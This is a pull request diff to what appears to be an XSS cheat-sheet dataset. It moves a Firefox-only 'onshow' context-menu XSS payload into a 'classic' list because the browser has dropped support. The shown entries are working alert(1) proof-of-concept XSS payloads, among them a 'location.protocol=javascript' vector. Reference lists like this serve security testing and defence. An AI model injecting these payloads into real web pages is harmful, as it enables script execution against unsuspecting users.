### PR TITLE
Support for contextmenus and onshow has been removed from Firefox

### DIFF
--- a/json/classic.json
+++ b/json/classic.json
@@ -166,6 +166,11 @@
     "browsers": ["firefox"]
   },
   {
+    "description": "onshow event for menu element in Firefox v102 and below",
+    "code": "<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>",
+    "browsers": ["firefox"]
+  },
+  {
     "description": "Assignable protocol with location",
     "code": "<script>location.protocol='javascript'</script>",
     "url": "https://portswigger-labs.net/xss/xss.php?x=%3Cscript%3Elocation.protocol=%27javascript%27;%3C/script%3E#%0aalert%281%29//",

--- a/json/events.json
+++ b/json/events.json
@@ -1,15 +1,4 @@
 {
-  "onshow": {
-    "description": "Fires context menu is shown",
-    "tags": [
-      {
-        "tag": "menu",
-        "code": "<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>",
-        "browsers": ["firefox"],
-        "interaction": true
-      }
-    ]
-  },
   "ontransitionstart": {
     "description": "Fires when a CSS transition starts",
     "tags": [


### PR DESCRIPTION
Removed here: https://hg-edge.mozilla.org/integration/autoland/rev/065b130fb59f#l32.13